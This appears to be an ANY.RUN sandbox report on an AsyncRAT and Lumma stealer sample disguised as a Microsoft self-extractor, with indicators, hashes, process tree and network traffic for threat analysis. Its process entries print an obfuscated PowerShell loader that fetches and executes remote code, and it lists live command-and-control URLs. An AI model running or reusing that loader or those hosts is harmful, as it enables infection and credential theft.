File name:

FdqlBTs.exe

Full analysis: https://app.any.run/tasks/cf888072-d998-4ae8-b5b9-a0cad8a418bd
Verdict: Malicious activity
Threats:

AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on Github as a legitimate open-source remote administration software, but hackers use it for its many powerful malicious functions.

Malware Trends Tracker     >>>
Analysis date: March 24, 2025, 21:03:33
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
stegocampaign
stealer
lumma
rat
asyncrat
remote
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64, for MS Windows, 6 sections
MD5:

1B129D080655A4C9F703A5DCE0195512

SHA1:

9EC187C55FC3F50D98C372A96913FD38462C4EBF

SHA256:

EE5C9B3DC922C0D16FD7A1E1D72C3530F9AEE1209A233764F8280EE7DBC3B353

SSDEEP:

6144:Po1GDF7f25lw/lJj2LnT25qndIjjVV8qtynD:Po1G57u5lw/qLnT25qndIPVVRtyD

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • STEGOCAMPAIGN has been detected

      • powershell.exe (PID: 8048)

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 8048)

    • Gets information about running processes via WMI (SCRIPT)

      • wscript.exe (PID: 7380)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 8048)

    • Steals credentials from Web Browsers

      • RegAsm.exe (PID: 7344)

    • ASYNCRAT has been detected (SURICATA)

      • powershell.exe (PID: 7372)

    • Connects to the CnC server

      • powershell.exe (PID: 7372)

    • Execute application with conhost.exe as parent process

      • powershell.exe (PID: 7372)

    • LUMMA mutex has been found

      • RegAsm.exe (PID: 7344)

    • Actions looks like stealing of personal data

      • RegAsm.exe (PID: 7344)

  • SUSPICIOUS

    • Process drops legitimate windows executable

      • FdqlBTs.exe (PID: 7704)

    • Executing commands from a ".bat" file

      • FdqlBTs.exe (PID: 7704)

    • Starts a Microsoft application from unusual location

      • FdqlBTs.exe (PID: 7704)

    • Starts CMD.EXE for commands execution

      • FdqlBTs.exe (PID: 7704)

    • Uses WMIC.EXE to obtain CPU information

      • cmd.exe (PID: 7724)

    • Get information on the list of running processes

      • powershell.exe (PID: 7944)

    • Application launched itself

      • powershell.exe (PID: 7944)

    • Probably download files using WebClient

      • powershell.exe (PID: 7944)

    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 7944)
      • conhost.exe (PID: 7276)
      • cmd.exe (PID: 7724)

    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 8048)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 7944)

    • Executed via WMI

      • conhost.exe (PID: 7276)

    • Creates an object to access WMI (SCRIPT)

      • wscript.exe (PID: 7380)

    • The process executes JS scripts

      • cmd.exe (PID: 7724)

    • Contacting a server suspected of hosting an CnC

      • powershell.exe (PID: 7372)

    • There is functionality for taking screenshot (YARA)

      • RegAsm.exe (PID: 7344)

    • Searches for installed software

      • RegAsm.exe (PID: 7344)

    • Probably obfuscated PowerShell command line is found

      • cmd.exe (PID: 7724)

  • INFO

    • The sample compiled with english language support

      • FdqlBTs.exe (PID: 7704)

    • Checks supported languages

      • FdqlBTs.exe (PID: 7704)
      • RegAsm.exe (PID: 7344)

    • Create files in a temporary directory

      • FdqlBTs.exe (PID: 7704)
      • powershell.exe (PID: 8048)

    • Reads security settings of Internet Explorer

      • WMIC.exe (PID: 7780)
      • powershell.exe (PID: 8048)

    • Reads the software policy settings

      • powershell.exe (PID: 8048)
      • RegAsm.exe (PID: 7344)
      • slui.exe (PID: 5800)

    • Checks proxy server information

      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 7372)
      • slui.exe (PID: 5800)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 8048)

    • Disables trace logs

      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 7372)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 7372)

    • Reads the computer name

      • RegAsm.exe (PID: 7344)

    • Reads the machine GUID from the registry

      • RegAsm.exe (PID: 7344)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 7372)

    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 7944)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 7944)

    • Gets a random number, or selects objects randomly from a collection (POWERSHELL)

      • powershell.exe (PID: 7944)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2090:06:11 09:36:52+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.26
CodeSize: 32768
InitializedDataSize: 163840
UninitializedDataSize: -
EntryPoint: 0x8460
OSVersion: 10
ImageVersion: 10
SubsystemVersion: 6
Subsystem: Windows GUI
FileVersionNumber: 11.0.20348.1
ProductVersionNumber: 11.0.20348.1
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Windows NT 32-bit
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Unicode
CompanyName: Microsoft Corporation
FileDescription: Win32 Cabinet Self-Extractor
FileVersion: 11.00.20348.1 (WinBuild.160101.0800)
InternalName: Wextract
LegalCopyright: © Microsoft Corporation. All rights reserved.
OriginalFileName: WEXTRACT.EXE .MUI
ProductName: Internet Explorer
ProductVersion: 11.00.20348.1
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
137
Monitored processes
14
Malicious processes
7
Suspicious processes
1

Behavior graph

Click at the process to see the details
start fdqlbts.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs find.exe no specs powershell.exe no specs #STEGOCAMPAIGN powershell.exe svchost.exe regasm.exe no specs #LUMMA regasm.exe wscript.exe no specs conhost.exe no specs #ASYNCRAT powershell.exe slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
5800C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
7276conhost --headless powershell $kcxehirfjzumlv='ur' ;set-alias protons c$($kcxehirfjzumlv)l;$lwrcpx=(5668,5667,5684,5671,5670,5667,5685,5671,5669,5681,5616,5682,5684,5681,5617,5619,5616,5682,5674,5682,5633,5685,5631,5672,5678,5675,5668,5667,5668,5669,5619,5619);$ospjen=('ertigos','get-cmdlet');$bszmkalfhpv=$lwrcpx;foreach($avxgnzdsuhi in $bszmkalfhpv){$gmphklfu=$avxgnzdsuhi;$utbfjnqdokhigr=$utbfjnqdokhigr+[char]($gmphklfu-5570);$gktdxfzup=$utbfjnqdokhigr; $jgifpyq=$gktdxfzup};$fucnvtrwyimp[2]=$jgifpyq;$rpethob='rl';$mksadlw=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $jgifpyq)C:\Windows\System32\conhost.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7288"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft .NET Assembly Registration Utility
Version:
4.8.9037.0 built by: NET481REL1
7344"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft .NET Assembly Registration Utility
Exit code:
0
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\regasm.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\aclayers.dll
7372powershell $kcxehirfjzumlv='ur' ;set-alias protons c$($kcxehirfjzumlv)l;$lwrcpx=(5668,5667,5684,5671,5670,5667,5685,5671,5669,5681,5616,5682,5684,5681,5617,5619,5616,5682,5674,5682,5633,5685,5631,5672,5678,5675,5668,5667,5668,5669,5619,5619);$ospjen=('ertigos','get-cmdlet');$bszmkalfhpv=$lwrcpx;foreach($avxgnzdsuhi in $bszmkalfhpv){$gmphklfu=$avxgnzdsuhi;$utbfjnqdokhigr=$utbfjnqdokhigr+[char]($gmphklfu-5570);$gktdxfzup=$utbfjnqdokhigr; $jgifpyq=$gktdxfzup};$fucnvtrwyimp[2]=$jgifpyq;$rpethob='rl';$mksadlw=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $jgifpyq)C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
conhost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
7380"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\IXP000.TMP\2.js" C:\Windows\System32\wscript.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
7704"C:\Users\admin\Desktop\FdqlBTs.exe" C:\Users\admin\Desktop\FdqlBTs.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Win32 Cabinet Self-Extractor
Exit code:
0
Version:
11.00.20348.1 (WinBuild.160101.0800)
Modules
Images
c:\users\admin\desktop\fdqlbts.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
7724cmd.exe /c 1.bat && 2.jsC:\Windows\System32\cmd.exeFdqlBTs.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
7732\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
24 012
Read events
24 010
Write events
2
Delete events
0

Modification events

(PID) Process:(7724) cmd.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.js\OpenWithProgids
Operation:writeName:JSFile
Value:
(PID) Process:(7380) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
Operation:writeName:JScriptSetScriptStateStarted
Value:
F220110000000000
Executable files
0
Suspicious files
2
Text files
9
Unknown types
0

Dropped files

PID
Process
Filename
Type
8048powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_hzsu14x4.mzs.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8048powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_1gptron2.3gh.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7944powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_pbwasygv.qvs.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8048powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:B0B20017EB93C725F3360526BC24E47F
SHA256:E82557A4BBD0FCB4AF179600AFB1B5B530EE153FF4354FA7BAC301509B083441
7704FdqlBTs.exeC:\Users\admin\AppData\Local\Temp\IXP000.TMP\1.battext
MD5:F6A8B35F102210019DCE8177B1DF901C
SHA256:1F0AEE2640D4748C088BD4AA0B8BEF5323ADD0778731FDFD3FA4D12ADDA1487B
7372powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_v0zsuqdb.dod.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7372powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_sijntjuw.pqc.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7944powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_yqrh2jj5.0u5.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7704FdqlBTs.exeC:\Users\admin\AppData\Local\Temp\IXP000.TMP\2.jsbinary
MD5:FAE294BEEEA146FCC79C6BA258159550
SHA256:0DB879398B091AAA19FE58C398B589C47A9E78194600CFDFF150C50F4EF40E31
8048powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_klz5xj50.c2l.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
14
TCP/UDP connections
29
DNS requests
12
Threats
6

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
6392
RUXIMICS.exe
GET
200
2.19.11.120:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
unknown
7372
powershell.exe
GET
200
2.58.15.254:80
http://baredaseco.pro/1.php?s=flibabc11
unknown
unknown
7372
powershell.exe
GET
302
185.250.151.155:80
http://ebmmnhkldkhdlbk.top/bn68qiewjfhtr.php?id=DESKTOP-JGLLJLD&key=74532125735&s=flibabc11
unknown
unknown
GET
200
192.96.205.175:443
https://shivalikhyundai.co.in/images/cdghaah.txt
unknown
text
492 Kb
unknown
GET
200
185.199.110.153:443
https://ofice365.github.io/1/test.jpg
unknown
image
5.48 Mb
unknown
POST
200
104.21.78.80:443
https://soliduso.digital/QUDis
unknown
binary
68 b
unknown
POST
200
172.67.218.154:443
https://soliduso.digital/QUDis
unknown
binary
68 b
unknown
POST
200
104.21.78.80:443
https://soliduso.digital/QUDis
unknown
binary
68 b
unknown
POST
200
172.67.218.154:443
https://soliduso.digital/QUDis
unknown
binary
43 b
unknown
POST
200
172.67.218.154:443
https://soliduso.digital/QUDis
unknown
binary
32.9 Kb
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
6392
RUXIMICS.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
4
System
192.168.100.255:137
unknown
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
4
System
192.168.100.255:138
unknown
6392
RUXIMICS.exe
2.19.11.120:80
crl.microsoft.com
Elisa Oyj
NL
unknown
8048
powershell.exe
185.199.108.153:443
ofice365.github.io
FASTLY
US
unknown
8048
powershell.exe
192.96.205.175:443
shivalikhyundai.co.in
LEASEWEB-USA-WDC
US
unknown
7344
RegAsm.exe
172.67.218.154:443
soliduso.digital
CLOUDFLARENET
US
unknown
7372
powershell.exe
2.58.15.254:80
baredaseco.pro
ASN-QUADRANET-GLOBAL
NL
unknown
7372
powershell.exe
185.250.151.155:80
ebmmnhkldkhdlbk.top
MIRholding B.V.
US
unknown

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
unknown
google.com
  • 216.58.206.78
unknown
crl.microsoft.com
  • 2.19.11.120
  • 2.19.11.105
unknown
ofice365.github.io
  • 185.199.108.153
  • 185.199.109.153
  • 185.199.110.153
  • 185.199.111.153
unknown
shivalikhyundai.co.in
  • 192.96.205.175
unknown
soliduso.digital
  • 172.67.218.154
  • 104.21.78.80
unknown
baredaseco.pro
  • 2.58.15.254
unknown
ebmmnhkldkhdlbk.top
  • 185.250.151.155
unknown
4xqqasqjdti51qa.com
unknown
activation-v2.sls.microsoft.com
  • 40.91.76.224
unknown

Threats

PID
Process
Class
Message
7372
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
2196
svchost.exe
Potentially Bad Traffic
ET DNS Query to a *.top domain - Likely Hostile
7372
powershell.exe
Potentially Bad Traffic
ET INFO HTTP Request to a *.top domain
7372
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
7372
powershell.exe
Malware Command and Control Activity Detected
ET MALWARE AsyncRAT Victim Checkin
1 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
FdqlBTs.exe